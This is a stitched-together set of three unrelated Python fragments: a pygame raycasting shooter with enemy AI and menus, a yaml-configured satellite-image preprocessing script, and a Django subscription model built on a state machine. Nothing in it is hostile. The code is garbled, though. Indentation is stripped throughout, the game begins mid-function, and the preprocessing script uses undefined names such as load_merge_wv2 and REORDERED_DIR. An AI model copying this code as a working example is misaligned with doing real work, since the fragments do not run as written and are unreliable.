pg.display.set_caption("Health: "+str(round(player_health, 1))+" Enemies: " + str(nenemies) + " FPS: " + str(fps)+ ' ' + msg)
posx, posy, rot, rotv = movement(pg.key.get_pressed(), posx, posy, rot, maph, er, rotv)
pg.mouse.set_pos(400,300)
def movement(pressed_keys, posx, posy, rot, maph, et, rotv):
x, y, diag = posx, posy, 0
if pg.mouse.get_focused():
p_mouse = pg.mouse.get_pos()
rot = rot + np.clip((p_mouse[0]-400)/200, -0.2, .2)
rotv = rotv + np.clip((p_mouse[1]-300)/200, -0.2, .2)
rotv = np.clip(rotv, -0.999, .999)
if pressed_keys[pg.K_UP] or pressed_keys[ord('w')]:
x, y, diag = x + et*np.cos(rot), y + et*np.sin(rot), 1
elif pressed_keys[pg.K_DOWN] or pressed_keys[ord('s')]:
x, y, diag = x - et*np.cos(rot), y - et*np.sin(rot), 1
if pressed_keys[pg.K_LEFT] or pressed_keys[ord('a')]:
et = et/(diag+1)
x, y = x + et*np.sin(rot), y - et*np.cos(rot)
elif pressed_keys[pg.K_RIGHT] or pressed_keys[ord('d')]:
et = et/(diag+1)
x, y = x - et*np.sin(rot), y + et*np.cos(rot)
posx, posy = check_walls(posx, posy, maph, x, y)
return posx, posy, rot, rotv
def gen_map(size):
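    # Scatter random wall blocks over the map (with a solid border), then carve a
    # random walk of empty cells from the player start; the exit is placed once the
    # walk has wandered far enough away, guaranteeing a walkable path start -> exit.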
mapc = np.random.uniform(0,1, (size,size,3))
maph = np.random.choice([0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 3, 4], (size,size))
maph[0,:] = np.random.choice([1, 2, 3, 4], size)
maph[size-1,:] = np.random.choice([1, 2, 3, 4], size)
maph[:,0] = np.random.choice([1, 2, 3, 4], size)
maph[:,size-1] = np.random.choice([1, 2, 3, 4], size)
posx, posy = np.random.randint(1, size -2)+0.5, np.random.randint(1, size -2)+0.5
rot, rotv, stepscount = np.pi/4, 0, posx + posy
x, y = int(posx), int(posy)
maph[x][y] = 0
count = 0
while True:
testx, testy = (x, y)
if np.random.uniform() > 0.5:
testx = testx + np.random.choice([-1, 1])
else:
testy = testy + np.random.choice([-1, 1])
if testx > 0 and testx < size -1 and testy > 0 and testy < size -1:
if maph[testx][testy] == 0 or count > 5:
count = 0
x, y = (testx, testy)
maph[x][y] = 0
dtx = np.sqrt((x-posx)**2 + (y-posy)**2)
if (dtx > size*.6 and np.random.uniform() > .999) or np.random.uniform() > .99999:
exitx, exity = (x, y)
break
else:
count = count+1
return posx, posy, rot, rotv, maph, mapc, exitx, exity, stepscount
def load_map(level):
mapc = pg.surfarray.array3d(pg.image.load('Assets/Levels/map'+str(level)+'.png'))
size = len(mapc)
maph = np.random.choice([1, 2, 3, 4], (size,size))
colors = np.asarray([[0,0,0], [255,255,255], [127,127,127]])
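    # color legend in the level image: black = walkable floor, white = player start, grey = level exit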
posx, exitx = None, None
for i in range(size):
for j in range(size):
color = mapc[i][j]
if (color == colors[0]).all() or (color == colors[1]).all() or (color == colors[2]).all():
maph[i][j] = 0
if (color == colors[1]).all():
posx, posy = i+0.5, j+0.5
if (color == colors[2]).all():
exitx, exity = i, j
    while posx is None:  # if no start is found
x, y = np.random.randint(1, size), np.random.randint(1, size)
if (mapc[x][y] == colors[0]).all():
posx, posy = x+0.5, y+0.5
    while exitx is None:  # if no exit is found
x, y = np.random.randint(1, size), np.random.randint(1, size)
if (mapc[x][y] == colors[0]).all():
exitx, exity = x, y
rot, rotv, stepscount = np.pi/4, 0, posx + posy
return posx, posy, rot, rotv, maph, mapc/255, exitx, exity, stepscount, size
@njit(cache=True)
def new_frame(posx, posy, rot, frame, sky, floor, hres, halfvres, mod, maph, size, wall, mapc,
exitx, exity, nenemies, rotv, door, window, bwall, exit2):
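    # Classic raycaster: for every horizontal screen column, march a ray from the
    # player position through the map in small steps until it hits a wall cell,
    # then use the hit distance to scale the wall slice, texture it, and shade the floor.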
offset = -int(halfvres*rotv)
for i in range(hres):
rot_i = rot + np.deg2rad(i/mod - 30)
sin, cos, cos2 = np.sin(rot_i), np.cos(rot_i), np.cos(np.deg2rad(i/mod - 30))
frame[i][:] = sky[int(np.rad2deg(rot_i)*2%720)][halfvres-offset:3*halfvres-offset]
n = 0
n2 = 0
x, y = posx +0.2*cos, posy +0.2*sin
for j in range(2000):
x, y = x +0.01*cos, y +0.01*sin
if n == 0 and maph[int(x)%(size-1)][int(y)%(size-1)] != 0: # found lower wall
n = np.sqrt((x-posx)**2+(y-posy)**2)
if maph[int(x)%(size-1)][int(y)%(size-1)] == 2:# found upper wall
n2 = np.sqrt((x-posx)**2+(y-posy)**2)
h = halfvres/(n2*cos2 + 0.001)
break
cwall = wall
if n2 > 0.5 and 3*h > int(halfvres/(n*cos2 + 0.000001)): #draw upper wall
xx = int(x*3%1*99)
xxx = x%1
if x%1 < 0.01 or x%1 > 0.99:
xx = int(y*3%1*99)
xxx = y%1
yy = np.linspace(0, 3, int(h*2))*99%99
shade = 0.3 + 0.7*(h/halfvres)
if shade > 1:
shade = 1
if maph[int(x-0.02)%(size-1)][int(y-0.02)%(size-1)] != 0:
shade = shade*0.8
c = shade*mapc[int(x)%(size-1)][int(y)%(size-1)]
if n2 > 3.5:
cwall = bwall
for k in range(int(h)*2):
c2 = c*cwall[xx][int(yy[k])]
h1 = int(halfvres - int(h) +k +offset -2*h +3)
h2 = int(halfvres+3*h-k+offset-1 +2*h - 6)
if xxx > 1/3 and xxx < 2/3 and k > h*2/3 and k < h*4/3:
c2 = shade*window[xx][int(yy[k])]
if h1 >= 0 and h1 < 2*halfvres:
frame[i][h1] = c2
if h2 < halfvres*2:
frame[i][h2] = c2
if n == 0:
n = 1000
x, y = posx +n*cos, posy +n*sin
walltype = maph[int(x)%(size-1)][int(y)%(size-1)]
cwall = wall
if n > 3.5:
cwall = bwall
h = int(halfvres/(n*cos2 + 0.000001))
xx = int(x*3%1*99)
xxx = x%1
if x%1 < 0.01 or x%1 > 0.99:
xx = int(y*3%1*99)
xxx = y%1
yy = np.linspace(0, 3, int(h*2))*99%99
shade = 0.4 + 0.6*(h/halfvres)
if shade > 1:
shade = 1
ash = 0
if maph[int(x-0.33)%(size-1)][int(y-0.33)%(size-1)] != 0:
ash = 1
if maph[int(x-0.01)%(size-1)][int(y-0.01)%(size-1)] != 0:
shade, ash = shade*0.7, 0
c = mapc[int(x)%(size-1)][int(y)%(size-1)]
cdoor = np.sqrt(np.ones(3) - c)
c = shade*c
start_range, stop_range = 0, int(2*h)
if h > halfvres+abs(offset):
start_range = int(h - halfvres - offset)
stop_range = int(h + halfvres - offset)
for k in range(start_range, stop_range):
c2 = c*cwall[xx][int(yy[k])]
h1 = int(halfvres - h +k +offset)
h2 = int(halfvres+3*h-k+offset-3)
if xxx > 1/3 and xxx < 2/3 and k > h*2/3:
if walltype < 3:
c2 = shade*cdoor*door[xx][int(yy[k])]
elif k < h*4/3 and walltype == 3:
c2 = shade*window[xx][int(yy[k])]
if h1 >= 0 and h1 < 2*halfvres:
if ash and 1-k/(2*h) < 1-xx/99:
c2, c, ash = 0.7*c2, 0.7*c, 0
frame[i][h1] = c2
if h2 < halfvres*2:
frame[i][h2] = c2
for j in range(int(halfvres -h -offset)): #floor
n = (halfvres/(halfvres-j - offset ))/cos2
x, y = posx + cos*n, posy + sin*n
xx, yy = int(x*3%1*99), int(y*3%1*99)
shade = min(0.2 + 0.8/n, 1)
if maph[int(x-0.33)%(size-1)][int(y-0.33)%(size-1)] != 0:
shade = shade*0.7
elif ((maph[int(x-0.33)%(size-1)][int(y)%(size-1)] and y%1>x%1) or
(maph[int(x)%(size-1)][int(y-0.33)%(size-1)] and x%1>y%1)):
shade = shade*0.7
frame[i][halfvres*2-j-1] = shade*(floor[xx][yy]*2+frame[i][halfvres*2-j-1])/3
if exit2 == 0 and int(x) == exitx and int(y) == exity and (x%1-0.5)**2 + (y%1-0.5)**2 < 0.2:
ee = j/(20*halfvres)
frame[i][j:2*halfvres-j] = (ee*np.ones(3)*255+frame[i][j:2*halfvres-j])/(1+ee)
return frame
@njit(cache=True)
def vision(posx, posy, enx, eny, dist2p, maph, size):
cos, sin = (posx-enx)/dist2p, (posy-eny)/dist2p
x, y = enx, eny
seen = 1
x, y = x +0.25*cos, y +0.25*sin
for i in range(abs(int((dist2p-0.5)/0.05))):
x, y = x +0.05*cos, y +0.05*sin
if (maph[int(x-0.02)%(size-1)][int(y-0.02)%(size-1)] or
maph[int(x-0.02)%(size-1)][int(y+0.02)%(size-1)] or
maph[int(x+0.02)%(size-1)][int(y-0.02)%(size-1)] or
maph[int(x+0.02)%(size-1)][int(y+0.02)%(size-1)]):
seen = 0
break
return seen
@njit(cache=True)
def enemies_ai(posx, posy, enemies, maph, size, mape, swordsp, ticks, player_health, nenemies, level=0):
if nenemies < 5: # teleport far enemies closer
for en in range(len(enemies)): # mape = enemies heatmap
if enemies[en][8] > 0:
enx, eny = enemies[en][0], enemies[en][1]
dist2p = np.sqrt((enx-posx)**2 + (eny-posy)**2 + 1e-16)
if dist2p > 10:
for i in range(10):
x, y = np.random.randint(1, size), np.random.randint(1, size)
dist2p = np.sqrt((x+0.5-posx)**2 + (y+0.5-posy)**2 + 1e-16)
if dist2p > 6 and dist2p < 8 and maph[x][y] == 0:
enemies[en][0], enemies[en][1] = x + 0.5, y + 0.5
break
for en in range(len(enemies)): # mape = enemies heatmap
if enemies[en][8] > 0:
x, y = int(enemies[en][0]), int(enemies[en][1])
mape[x-1:x+2, y-1:y+2] = mape[x-1:x+2, y-1:y+2] + 1
for en in range(len(enemies)):
if enemies[en][8] > 0 and np.random.uniform(0,1) < 0.1: # update only % of the time
enx, eny, angle = enemies[en][0], enemies[en][1], enemies[en][6]
health, state, cooldown = enemies[en][8], enemies[en][9], enemies[en][10]
dist2p = np.sqrt((enx-posx)**2 + (eny-posy)**2 + 1e-16)
friends = mape[int(enx)][int(eny)] - 1
if dist2p > 1.42: # add friends near the player if not too close
friends = friends + mape[int(posx)][int(posy)]
not_afraid = 0
# zombies are less afraid
if health > 1 + enemies[en][4] - level or health + friends > 3 + enemies[en][4] - level:
not_afraid = 1
if state == 0 and dist2p < 6: # normal
angle = angle2p(enx, eny, posx, posy)
angle2 = (enemies[en][6]-angle)%(2*np.pi)
if angle2 > 11*np.pi/6 or angle2 < np.pi/6 or (swordsp >= 1 and dist2p < 3): # in fov or heard
if vision(posx, posy, enx, eny, dist2p, maph, size):
if not_afraid and ticks - cooldown > 5:
state = 1 # turn aggressive
elif dist2p < 2:
state = 2 # retreat
angle = angle - np.pi
else:
angle = enemies[en][6] # revert to original angle
elif state == 1: # aggressive
if dist2p < 0.8 and ticks - cooldown > 10: # perform attack, 2s cooldown
enemies[en][10] = ticks # reset cooldown, damage is lower with more enemies on same cell
player_health = player_health - np.random.uniform(0.1, 1 + level/3)/np.sqrt(1+mape[int(posx)][int(posy)])
state = 2
if not_afraid: # turn to player
angle = angle2p(enx, eny, posx, posy)
else: # retreat
state = 2
elif state == 2: # defensive
if not_afraid and ticks - cooldown > 5:
state = 0
else:
angle = angle2p(posx, posy, enx, eny) + np.random.uniform(-0.5, 0.5) #turn around
enemies[en][6], enemies[en][9] = angle+ np.random.uniform(-0.2, 0.2), state
return enemies, player_health, mape
@njit(cache=True)
def check_walls(posx, posy, maph, x, y): # for walking
if not(maph[int(x-0.2)][int(y)] or maph[int(x+0.2)][int(y)] or #check all sides
maph[int(x)][int(y-0.2)] or maph[int(x)][int(y+0.2)]):
posx, posy = x, y
elif not(maph[int(posx-0.2)][int(y)] or maph[int(posx+0.2)][int(y)] or # move only in y
maph[int(posx)][int(y-0.2)] or maph[int(posx)][int(y+0.2)]):
posy = y
elif not(maph[int(x-0.2)][int(posy)] or maph[int(x+0.2)][int(posy)] or # move only in x
maph[int(x)][int(posy-0.2)] or maph[int(x)][int(posy+0.2)]):
posx = x
return posx, posy
@njit(cache=True)
def angle2p(posx, posy, enx, eny):
angle = np.arctan((eny-posy)/(enx-posx+1e-16))
if abs(posx+np.cos(angle)-enx) > abs(posx-enx):
angle = (angle - np.pi)%(2*np.pi)
return angle
@njit(cache=True)
def sort_sprites(posx, posy, rot, enemies, maph, size, er):
for en in range(len(enemies)):
enemies[en][3] = 9999
if enemies[en][8] > 0: # dont bother with the dead
enx, eny = enemies[en][0], enemies[en][1]
backstep = 1
if enemies[en][9] == 1 and enemies[en][3] > 1.7 and enemies[en][3] < 10:
backstep = -1 # avoid going closer than necessary to the player
speed = backstep*er*(2+enemies[en][9]/2)
cos, sin = speed*np.cos(enemies[en][6]), speed*np.sin(enemies[en][6])
x, y = enx+cos, eny+sin
enx, eny = check_walls(enx, eny, maph, x, y)
if enx == enemies[en][0] and eny == enemies[en][1]:
x, y = enx-cos, eny-sin
enx, eny = check_walls(enx, eny, maph, x, y)
if enx == enemies[en][0] and eny == enemies[en][1]:
if maph[int(x)][int(y)] == 0:
enx, eny = x, y
            if enx == enemies[en][0] or eny == enemies[en][1]: # check collisions
enemies[en][6] = enemies[en][6] + np.random.uniform(-0.5, 0.5)
if np.random.uniform(0,1) < 0.01:
enemies[en][9] = 0 # return to normal state
enemies[en][0], enemies[en][1] = enx, eny
angle = angle2p(posx, posy, enx, eny)
angle2= (rot-angle)%(2*np.pi)
if angle2 > 10.5*np.pi/6 or angle2 < 1.5*np.pi/6:
dir2p = ((enemies[en][6] - angle -3*np.pi/4)%(2*np.pi))/(np.pi/2)
dist2p = np.sqrt((enx-posx)**2+(eny-posy)**2+1e-16)
enemies[en][2] = angle2
enemies[en][7] = dir2p
if vision(enx, eny, posx, posy, dist2p, maph, size):
enemies[en][3] = 1/dist2p
enemies = enemies[enemies[:, 3].argsort()]
return enemies
def spawn_enemies(number, maph, msize, posx, posy, level=0):
enemies = []
for i in range(number):
x, y = np.random.randint(1, msize-2), np.random.randint(1, msize-2)
while maph[x][y] or (x == int(posx) and y == int(posy)):
x, y = np.random.randint(1, msize-2), np.random.randint(1, msize-2)
x, y = x+0.5, y+0.5
angle2p, invdist2p, dir2p = 0, 1, 0 # angle, inv dist, dir2p relative to player
entype = np.random.choice([0,1]) # 0 zombie, 1 skeleton
direction = np.random.uniform(0, 2*np.pi) # facing direction
size = np.random.uniform(7, 10)
health = size/2 + level/3
state = np.random.randint(0,3) # 0 normal, 1 aggressive, 2 defensive
        cooldown = 0 # attack cooldown
# 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10
enemies.append([x, y, angle2p, invdist2p, entype, size, direction, dir2p, health, state, cooldown])
return np.asarray(enemies)
def get_sprites(level):
sheet = pg.image.load('Assets/Sprites/zombie_n_skeleton'+str(level)+'.png').convert_alpha()
sprites = [[], []]
swordsheet = pg.image.load('Assets/Sprites/gun1.png').convert_alpha()
sword = []
for i in range(3):
sword.append(pg.Surface.subsurface(swordsheet,(i*800,0,800,600)))
xx = i*32
sprites[0].append([])
sprites[1].append([])
for j in range(4):
yy = j*100
sprites[0][i].append(pg.Surface.subsurface(sheet,(xx,yy,32,100)))
sprites[1][i].append(pg.Surface.subsurface(sheet,(xx+96,yy,32,100)))
spsize = np.asarray(sprites[0][1][0].get_size())
sword.append(sword[1]) # extra middle frame
swordsp = 0 #current sprite for the sword
return sprites, spsize, sword, swordsp
def draw_sprites(surf, sprites, enemies, spsize, hres, halfvres, ticks, sword, swordsp, rotv):
#enemies : x, y, angle2p, dist2p, type, size, direction, dir2p
offset = int(rotv*halfvres)
cycle = int(ticks)%3 # animation cycle for monsters
for en in range(len(enemies)):
if enemies[en][3] > 10:
break
types, dir2p = int(enemies[en][4]), int(enemies[en][7])
cos2 = np.cos(enemies[en][2])
scale = min(enemies[en][3], 2)*spsize*enemies[en][5]/cos2*hres/800
vert = halfvres + halfvres*min(enemies[en][3], 2)/cos2 - offset
hor = hres/2 - hres*np.sin(enemies[en][2])
if enemies[en][3] > 0.333:
spsurf = pg.transform.scale(sprites[types][cycle][dir2p], scale)
else:
spsurf = pg.transform.smoothscale(sprites[types][cycle][dir2p], scale)
surf.blit(spsurf, (hor,vert)-scale/2)
swordpos = (np.sin(ticks)*10*hres/800,(np.cos(ticks)*10+15)*hres/800) # sword shake
spsurf = pg.transform.scale(sword[int(swordsp)], (hres, halfvres*2))
surf.blit(spsurf, swordpos)
return surf, en-1
def draw_colonel(surf, colonel, posx, posy, enx, eny, hres, halfvres, rot, rotv, maph, size):
angle = angle2p(posx, posy, enx, eny)
angle2= (rot-angle)%(2*np.pi)
if angle2 > 10.5*np.pi/6 or angle2 < 1.5*np.pi/6:
dist2p = np.sqrt((enx-posx)**2+(eny-posy)**2+1e-16)
if vision(enx, eny, posx, posy, dist2p, maph, size):
offset = int(rotv*halfvres)
cos2 = np.cos(angle2)
spsize = np.asarray(colonel.get_size())
scale = min(1/dist2p, 2)*spsize*6/cos2*hres/800
vert = halfvres + halfvres*min(1/dist2p, 2)/cos2 - offset
hor = hres/2 - hres*np.sin(angle2)
if dist2p < 3:
spsurf = pg.transform.scale(colonel, scale)
else:
spsurf = pg.transform.smoothscale(colonel, scale)
surf.blit(spsurf, (hor,vert)-scale/2)
return surf
def load_sounds():
sounds = {}
sounds['step'] = pg.mixer.Sound('Assets/Sounds/playerstep.mp3')
sounds['step2'] = pg.mixer.Sound('Assets/Sounds/enemystep.mp3')
sounds['swoosh'] = pg.mixer.Sound('Assets/Sounds/gun.mp3')
sounds['swoosh2'] = pg.mixer.Sound('Assets/Sounds/gun2.mp3')
sounds['hurt'] = pg.mixer.Sound('Assets/Sounds/damage.mp3')
sounds['deadmonster'] = pg.mixer.Sound('Assets/Sounds/deadmonster.mp3')
sounds['hitmonster'] = pg.mixer.Sound('Assets/Sounds/hitmonster.mp3')
sounds['hitmonster2'] = pg.mixer.Sound('Assets/Sounds/hitmonster2.mp3')
sounds['healthup'] = pg.mixer.Sound('Assets/Sounds/healthup.wav')
sounds['died'] = pg.mixer.Sound('Assets/Sounds/died.wav')
sounds['won'] = pg.mixer.Sound('Assets/Sounds/won.wav')
sounds['music0'] = pg.mixer.Sound('Assets/Sounds/battlemusic0.mp3')
sounds['music1'] = pg.mixer.Sound('Assets/Sounds/battlemusic1.mp3')
return sounds
def pause_menu(surf, menu, pause, options, click, running, m_vol, sfx_vol, sounds, newgame, font, msg, level, ticks, hres, story):
adjust_res = 1
p_mouse = pg.mouse.get_pos()
if options == 0: # main menu
if p_mouse[0] < 600 and p_mouse[1] > 200 and p_mouse[1] < 265: # continue
pg.draw.rect(surf,(150,250,150),(0,200,600,65))
if click:
if newgame == 2:
newgame, story = 1, 1
else:
pause = 0
pg.mouse.set_pos(400,300)
elif p_mouse[0] < 600 and p_mouse[1] > 300 and p_mouse[1] < 365: # new game
pg.draw.rect(surf,(150,150,250),(0,300,600,65))
if click:
if newgame == 0:
newgame = 1
else:
newgame, story = 1, 0
elif p_mouse[0] < 600 and p_mouse[1] > 400 and p_mouse[1] < 465: # options
pg.draw.rect(surf,(150,150,150),(0,400,600,65))
if click:
options = 1
elif p_mouse[0] < 600 and p_mouse[1] > 500 and p_mouse[1] < 565: # leave
pg.draw.rect(surf,(250,150,150),(0,500,600,65))
if click:
if newgame == 0:
newgame = 2
else:
running = 0
elif p_mouse[0] > 679 and p_mouse[1] > 509: # i button
pg.draw.circle(surf,(250,150,150),(736,556), 42)
if click:
options = 2
if newgame == 0:
surf.blit(menu[3], (0,0))
else:
surf.blit(menu[0], (0,0))
if newgame == 0:
surf.blit(font.render(msg, 1, (255, 255, 255)), (30, 100+5*np.sin(ticks-1)))
surf.blit(font.render(msg, 1, (30, 255, 155)), (32, 100+5*np.sin(ticks)))
surf.blit(font.render(str(level), 1, (255, 255, 255)), (675, 275+5*np.sin(ticks-1)))
surf.blit(font.render(str(level), 1, (255, 100, 50)), (677, 275+5*np.sin(ticks)))
elif options == 1: # options menu
if p_mouse[0] > 50 and p_mouse[0] < 130 and p_mouse[1] > 220 and p_mouse[1] < 290: # -resol
pg.draw.rect(surf,(150,250,150),(60,220,70,70))
if click:
adjust_res = 0.9
elif p_mouse[0] > 650 and p_mouse[0] < 720 and p_mouse[1] > 220 and p_mouse[1] < 290: # +resol
pg.draw.rect(surf,(150,250,150),(650,220,70,70))
if click:
adjust_res = 1.1
elif click and p_mouse[0] > 123 and p_mouse[0] < 646 and p_mouse[1] > 360 and p_mouse[1] < 424:
sfx_vol = (p_mouse[0] - 123)/523
set_volume(m_vol, sfx_vol, sounds)
elif click and p_mouse[0] > 123 and p_mouse[0] < 646 and p_mouse[1] > 512 and p_mouse[1] < 566:
m_vol = (p_mouse[0] - 123)/523
set_volume(m_vol, sfx_vol, sounds)
surf.blit(menu[options], (0,0))
pg.draw.polygon(surf, (50, 200, 50), ((123, 414), (123+523*sfx_vol, 414-54*sfx_vol), (123+520*sfx_vol, 418)))
pg.draw.polygon(surf, (50, 200, 50), ((123, 566), (123+523*m_vol, 566-54*m_vol), (123+520*m_vol, 570)))
surf.blit(font.render(str(hres)+" x "+str(int(hres*0.75)), 1, (255, 255, 255)), (200, 220+5*np.sin(ticks-1)))
surf.blit(font.render(str(hres)+" x "+str(int(hres*0.75)), 1, (255, 100, 50)), (202, 220+5*np.sin(ticks)))
elif options == 2: # info
surf.blit(menu[options], (0,0))
if options > 0 and p_mouse[0] > 729 and p_mouse[1] < 60 : # x button
pg.draw.circle(surf,(0,0,0),(768,31), 30)
if click:
options = 0
surf.blit(menu[options], (0,0))
#draw cursor
pg.draw.polygon(surf, (200, 50, 50), ((p_mouse), (p_mouse[0]+20, p_mouse[1]+22), (p_mouse[0], p_mouse[1]+30)))
return surf, pause, options, running, newgame, adjust_res, m_vol, sfx_vol, story
def adjust_resolution(hres=250):
hres = max(min(hres, 800), 80) # limit range from 80x60 to 800x600
halfvres = int(hres*0.375) #vertical resolution/2
mod = hres/60 #scaling factor (60° fov)
frame = np.random.randint(0,255, (hres, halfvres*2, 3))
return hres, halfvres, mod, frame
def set_volume(m_vol, sfx_vol, sounds):
for key in sounds.keys():
sounds[key].set_volume(sfx_vol)
sounds['music0'].set_volume(m_vol)
sounds['music1'].set_volume(m_vol)
def splash_screen(msg, splash, clock, font, screen):
running = 1
clickdelay = 0
while running:
clickdelay += 1
clock.tick(60)
surf = splash.copy()
ticks = pg.time.get_ticks()/200
surf.blit(font.render(msg, 1, (0, 0, 0)), (50, 450+5*np.sin(ticks-1)))
surf.blit(font.render(msg, 1, (255, 255, 255)), (52, 450+5*np.sin(ticks)))
p_mouse = pg.mouse.get_pos()
pg.draw.polygon(surf, (200, 50, 50), ((p_mouse), (p_mouse[0]+20, p_mouse[1]+22), (p_mouse[0], p_mouse[1]+30)))
screen.blit(surf, (0,0))
pg.display.update()
for event in pg.event.get():
            if event.type == pg.KEYDOWN or (event.type == pg.MOUSEBUTTONDOWN and clickdelay > 50):
return
elif event.type == pg.QUIT:
pg.quit()
if clickdelay == 180:
msg = "Press any key..."
def load_textures(textures):
sky1 = pg.image.load('Assets/Textures/skybox'+str(textures[0])+'.jpg')
floor = pg.surfarray.array3d(pg.image.load('Assets/Textures/floor'+str(textures[1])+'.jpg'))
wall = pg.surfarray.array3d(pg.image.load('Assets/Textures/wall'+str(textures[2])+'.jpg'))
bwall = pg.transform.smoothscale(pg.image.load('Assets/Textures/wall'+str(textures[2])+'.jpg'), (25,25))
bwall = pg.surfarray.array3d(pg.transform.smoothscale(bwall, (100,100)))
door = pg.surfarray.array3d(pg.image.load('Assets/Textures/door'+str(textures[3])+'.jpg'))
window = pg.surfarray.array3d(pg.image.load('Assets/Textures/window'+str(textures[4])+'.jpg'))
if textures[0]%3 > 0: # darker at night
        floor = (floor*(1-0.2*(textures[0]%3))).astype(int)
        wall = (wall*(1-0.2*(textures[0]%3))).astype(int)
        bwall = (bwall*(1-0.2*(textures[0]%3))).astype(int)
        door = (door*(1-0.2*(textures[0]%3))).astype(int)
        window = (window*(1-0.2*(textures[0]%3))).astype(int)
return sky1, floor, wall, bwall, door, window
if __name__ == '__main__':
main()
pg.mixer.fadeout(1000)
pg.time.wait(1000)
pg.quit()
|
470944
|
import os
import yaml
def parse_yaml(input_file):
    """Parse yaml file of configuration parameters."""
    with open(input_file, "r") as yaml_file:
        params = yaml.safe_load(yaml_file)
return params
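# A minimal sketch of the "preprocess_config.yaml" layout this script expects,
# inferred from the keys accessed below; the directory names on the right are
# illustrative assumptions, not the project's actual values:
#
#   dirs:
#     root: /data/project          # hypothetical
#     dataset: dataset
#     reorder: reordered
#     train: train
#     test: test
#     gridded_imgs: gridded_imgs
#     gridded_labels: gridded_labels
#     opened: opened
#     instances: instances
#     results: results
#     source_imgs: source_imgs
#     source_labels: source_labels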
params = parse_yaml("preprocess_config.yaml")
ROOT = params["dirs"]["root"]
DATASET = os.path.join(ROOT, params["dirs"]["dataset"])
REORDER = os.path.join(DATASET, params["dirs"]["reorder"])
TRAIN = os.path.join(DATASET, params["dirs"]["train"])
TEST = os.path.join(DATASET, params["dirs"]["test"])
GRIDDED_IMGS = os.path.join(DATASET, params["dirs"]["gridded_imgs"])
GRIDDED_LABELS = os.path.join(DATASET, params["dirs"]["gridded_labels"])
OPENED = os.path.join(DATASET, params["dirs"]["opened"])
INSTANCES = os.path.join(DATASET, params["dirs"]["instances"])
RESULTS = os.path.join(
ROOT, "../", params["dirs"]["results"], params["dirs"]["dataset"]
)
SOURCE_IMGS = os.path.join(ROOT, params["dirs"]["source_imgs"])
SOURCE_LABELS = os.path.join(ROOT, params["dirs"]["source_labels"])
# all files, including ones we don't care about
file_ids_all = next(os.walk(SOURCE_IMGS))[2]
# all multispectral on and off season tifs
image_ids_all = [
image_id for image_id in file_ids_all if "MS" in image_id and ".aux" not in image_id
]
# check for duplicates
assert len(image_ids_all) == len(set(image_ids_all))
image_ids_gs = [image_id for image_id in image_ids_all if "GS" in image_id]
image_ids_os = [image_id for image_id in image_ids_all if "OS" in image_id]
# check for equality
assert len(image_ids_os) == len(image_ids_gs)
# only select growing season images
image_ids_short = [image_id[0:9] for image_id in image_ids_gs]
for imid in image_ids_short:
load_merge_wv2(imid, WV2_DIR)
image_list = next(os.walk(REORDERED_DIR))[2]
|
470951
|
import typing as t
from datetime import date, datetime, timedelta
from django.conf import settings
from django.db import models
from django.db.models.expressions import ExpressionWrapper as E
from django.utils import timezone
from django_fsm import FSMIntegerField, can_proceed, transition
from django_fsm_log.decorators import fsm_log_by, fsm_log_description
from . import signals
from .fsm_hooks import post_transition
from .states import SubscriptionState as State
def as_date(dt):
# type: (datetime) -> date
if timezone.is_aware(dt):
return timezone.localdate(dt)
return dt.date()
class SubscriptionManager(models.Manager):
def add_subscription(self, start, end, reference):
return self.create(state=State.ACTIVE, start=start, end=end, reference=reference)
def trigger_renewals(self):
"""
Finds all subscriptions that are due to be renewed, and begins the renewal process.
"""
count = 0
renewals = self.get_queryset().renewals_due().order_by("last_updated").iterator()
for subscription in renewals:
subscription.renew()
count += 1
return count
def trigger_expiring(self):
"""
Finds all subscriptions that have now finished, and begins the end subscription process.
"""
count = 0
ended = self.get_queryset().expiring().order_by("last_updated").iterator()
for subscription in ended:
subscription.end_subscription()
count += 1
return count
def trigger_suspended(self):
"""
Finds all subscriptions that are due and suspended, and begins the renewal process.
This is useful for handling retries after a failed renewal.
"""
count = 0
suspended = self.get_queryset().suspended().order_by("last_updated").iterator()
for subscription in suspended:
subscription.renew()
count += 1
return count
def trigger_suspended_timeout(self, timeout_hours=48, timeout_days=None):
"""
Finds all subscriptions that have remained in Suspended status for `timeout_hours`, and begins
the end subscription process.
`timeout_days` is deprecated.
"""
if timeout_days is not None:
timeout_hours = timeout_days * 24
count = 0
suspended = (
self.get_queryset().suspended_timeout(timeout_hours).order_by("last_updated").iterator()
)
for subscription in suspended:
subscription.end_subscription()
count += 1
return count
def trigger_stuck(self, timeout_hours=2):
"""
Finds all subscriptions that begun the renewal process but did not complete, and moves them
to the unknown state, requiring manual intervention.
Subscriptions in this state usually crashed during the renewal process, so we don't know if
the renewal succeeded or failed.
"""
retry_stuck = getattr(settings, "SUBSCRIPTIONS_STUCK_RETRY", False)
count = 0
old_renewing: t.Iterable[Subscription] = self.get_queryset().stuck(timeout_hours).order_by(
"last_updated"
).iterator()
for subscription in old_renewing:
if retry_stuck:
subscription.renewal_failed(description="stuck subscription")
else:
subscription.state_unknown(description="stuck subscription")
count += 1
return count
class SubscriptionQuerySet(models.QuerySet):
def renewals_due(self):
return self.filter(state=State.ACTIVE, end__lt=timezone.now())
def expiring(self):
return self.filter(state=State.EXPIRING, end__lt=timezone.now())
def suspended(self):
return self.filter(state=State.SUSPENDED, end__lt=timezone.now())
def suspended_timeout(self, timeout_hours=48, timeout_days=None):
if timeout_days is not None:
timeout_hours = timeout_days * 24
return self.annotate(
cutoff=E(
models.F("end") + timedelta(hours=timeout_hours),
output_field=models.DateTimeField(),
)
).filter(state=State.SUSPENDED, cutoff__lte=timezone.now())
def stuck(self, timeout_hours=2):
return self.filter(
state=State.RENEWING, last_updated__lte=timezone.now() - timedelta(hours=timeout_hours)
)
class Subscription(models.Model):
state = FSMIntegerField(
default=State.ACTIVE,
choices=State.choices(),
protected=True,
help_text="The current status of the subscription. May not be modified directly.",
)
start = models.DateTimeField(default=timezone.now, help_text="When the subscription begins")
end = models.DateTimeField(help_text="When the subscription ends")
reference = models.TextField(max_length=100, help_text="Free text field for user references")
last_updated = models.DateTimeField(
auto_now=True, help_text="Keeps track of when a record was last updated"
)
reason = models.TextField(help_text="Reason for state change, if applicable.")
objects = SubscriptionManager.from_queryset(SubscriptionQuerySet)()
class Meta:
indexes = [
models.Index(fields=["state"], name="subscription_state_idx"),
models.Index(fields=["end"], name="subscription_end_idx"),
models.Index(fields=["last_updated"], name="subscription_last_updated_idx"),
]
get_latest_by = "start"
